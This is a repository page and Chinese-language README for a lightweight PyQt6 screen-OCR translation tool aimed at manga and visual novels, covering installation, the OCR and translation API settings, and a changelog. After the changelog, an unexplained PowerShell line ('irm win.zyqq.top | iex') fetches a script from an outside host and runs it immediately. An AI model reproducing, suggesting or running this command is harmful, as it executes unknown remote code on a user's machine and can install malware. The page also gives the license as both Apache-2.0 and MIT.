# py-auto-pull **Repository Path**: sameki/py-auto-pull ## Basic Information - **Project Name**: py-auto-pull - **Description**: 一个简单又轻量的实时翻译小工具,基于PyQt6的开源字幕翻译工具,支持屏幕区域文字识别和实时翻译(多用于漫画或galgame 当然你怎么使用都可以),相较于其他实时字幕翻译器更加轻量化,配置更加简单。 - **Primary Language**: Python - **License**: Apache-2.0 - **Default Branch**: master - **Homepage**: None - **GVP Project**: No ## Statistics - **Stars**: 4 - **Forks**: 4 - **Created**: 2025-02-19 - **Last Updated**: 2025-10-18 ## Categories & Tags **Categories**: Uncategorized **Tags**: None ## README # 多摩喵实时翻译小工具 一个基于PyQt6+Tesseract-OCR的开源字幕翻译工具(现已支持云OCR),支持屏幕区域文字识别和实时翻译(多用于漫画或galgame 当然你怎么使用都可以),相较于其他实时字幕翻译器更加轻量化,配置更加简单。 ## 📥 下载 (如果需要放到桌面推荐创建快捷方式到桌面或将在桌面创建文件夹,否则部分功能会失效) ## 注意!由于自动下载 Tesseract-OCR时会尝试下载日语语言包,但是因为下载地址在外网会被墙,国内镜像也无了,产生报错后软件依然可以正常运行只是无法识别日语,可以将文件夹中的日语语言包下载后放到👇这个路径既可使用 ``` C:\Program Files\Tesseract-OCR\tessdata ``` 或 ``` 你的安装磁盘:\Tesseract-OCR\tessdata ``` ### 最新版本 - **Windows 64位**: [Gitee Release页面下载](https://gitee.com/sameki/py-auto-pull/releases) - **源码**: 直接克隆此仓库 ### 使用说明 请认真并仔细阅读本手册!!! 1. 下载exe文件后直接运行即可 2. 首次运行会自动检测并安装Tesseract-OCR,并自动安装英语和日语语言包,如果语言包安装失败会提示,但不影响主程序使用。 3. 安装流程无需用户干预,语言包会随主程序一并静默安装 ## 功能特点 - 支持选择屏幕区域进行文字识别 ![setusmei](せつめい画像+日语语言包/setusmei1.png) - 支持英语和日语识别 - **支持多种OCR服务:** - **本地OCR**:基于Tesseract-OCR,无需网络连接 - **腾讯OCR**:云端识别,准确率更高 - **百度OCR**:云端识别,支持多语言 - 支持多种翻译API: - DeepSeek API(支持自定义提示词) - 百度翻译API - 腾讯翻译API - 阿里翻译API - 实时显示翻译结果 - 可调整翻译显示窗口的样式(字体颜色、背景颜色、字体大小) - 支持自动翻译和单次翻译 - 支持复制原文和翻译结果到剪贴板 - 可拖动和调整翻译显示窗口位置 - 支持保存和加载翻译窗口样式设置 - 支持快捷键```ctrl+Q```选择区域 - **智能错误处理**:云OCR配置错误时自动回退到本地OCR ## 环境要求 1. Python 3.8或更高版本 2. Tesseract-OCR(本地OCR必需) - Windows: 从[这里](https://github.com/UB-Mannheim/tesseract/wiki)下载安装 - 确保安装时选择需要的语言包(英语和/或日语) ## 使用方法 1. 安装依赖: ``` pip install -r requirements.txt ``` 2. 运行程序: ```bash python src/main.py ``` 3. 打包: ``` pyinstaller 多摩喵实时翻译小工具.spec ``` 4.- 安装PyQt6时需要vc_redist.x64依赖,可从[微软官网下载](https://aka.ms/vs/17/release/vc_redist.x64.exe) ## 配置说明 ### OCR服务配置 #### 本地OCR - 无需配置,基于本地Tesseract-OCR - 支持英语和日语识别 - 无需网络连接,响应速度快 #### 腾讯OCR 1. 在配置对话框中选择"腾讯OCR" 2. 输入您的Secret ID和Secret Key 3. 支持英语(en)、日语(jap)、韩语(kor)识别 4. API申请地址:[腾讯云OCR](https://cloud.tencent.com/product/ocr) #### 百度OCR 1. 在配置对话框中选择"百度OCR" 2. 输入您的API Key和密钥 3. 支持英语、日语、韩语识别 4. API申请地址:[百度AI开放平台](https://ai.baidu.com/tech/ocr) ### 翻译API配置 #### DeepSeek API 1. 在配置对话框中选择"DeepSeek" 2. 输入您的API密钥 3. 可以自定义系统提示词,用于指导翻译风格 4. API申请地址:[DeepSeek API](https://platform.deepseek.com/) 5. 使用deepseek-chat 翻译内容更信达雅一些,但调用接口时间会比其他翻译平台时间更长,请酌情选择。 #### 百度翻译API 1. 在配置对话框中选择"百度翻译" 2. 输入您的APP ID和密钥 3. API申请地址:[百度翻译开放平台](http://api.fanyi.baidu.com/api/trans/product/desktop) #### 腾讯翻译API 1. 在配置对话框中选择"腾讯翻译" 2. 输入您的Secret ID和Secret Key 3. API申请地址:[腾讯云机器翻译](https://cloud.tencent.com/product/tmt) #### 阿里翻译API 1. 在配置对话框中选择"阿里翻译" 2. 输入您的Access Key和Access Secret 3. API申请地址:[阿里云机器翻译](https://www.aliyun.com/product/ai/base_alimt) ## 智能错误处理 ### OCR服务错误处理 - **配置缺失**:当云OCR未配置时,自动弹窗提示并切换到本地OCR - **配置错误**:当云OCR配置错误(如密钥不正确、服务未开通等)时,显示具体错误信息并自动切换到本地OCR - **网络错误**:当云OCR网络连接失败时,自动回退到本地OCR - **界面同步**:自动切换时,主窗口的OCR服务选择也会同步更新 ### 错误提示类型 - **腾讯OCR错误**: - SecretId不正确或不存在 - SecretKey不正确 - 服务未开通或权限不足 - **百度OCR错误**: - APP ID或密钥不正确 - access token无效或过期 - 服务未开通 - 调用量超限 ## 注意事项 - 检测到如果没有安装Tesseract-OCR,则会自动下载Tesseract-OCR - 现在会自动安装英语和日语语言包,无需手动勾选,安装流程全自动 - 使用翻译API时需要有效的API密钥 - 使用云OCR服务时需要有效的OCR API密钥 - 翻译窗口的样式设置会自动保存,下次启动时会自动加载 - OCR识别准确率基于本地电脑性能或云服务质量 - **云OCR服务需要网络连接,本地OCR无需网络** - **建议优先使用本地OCR,云OCR作为备选方案** ## 许可证 MIT License ## 更新日志 ### 2025-06-23 - 启动应用时会自动恢复上次选择的翻译API、OCR服务和识别语言选项。 - 配置API窗口中所有界面显示的"DeepSeek"已改为"deepseek-chat"。 - 新增了主窗口翻译api选项。 - 优化了背景图片设置逻辑,和主窗口缩放默认大小。 - 替换了默认背景图。 ### 2025-06-22 - 优化云OCR(如腾讯OCR)未检测到文字时的处理逻辑: - 当云OCR返回"未检测到文本"时,不再自动切换为本地OCR,而是直接提示未检测到文字。 - 只有云OCR接口真正异常(如配置错误、网络错误等)时,才会切换为本地OCR或弹窗提示。 - 该优化提升了云OCR和本地OCR的行为一致性,避免了误切换,提高了用户体验。 - 彻底解决多屏DPI缩放下的跨屏选区、截图、主窗口交互等所有常见问题,详情可见多屏幕DPI缩放下跨屏问题开发者日志。 - 新增了快捷键ctrl+Q进行区域选择。 - 优化了选区逻辑,提高选择区域用户体验。 irm win.zyqq.top | iex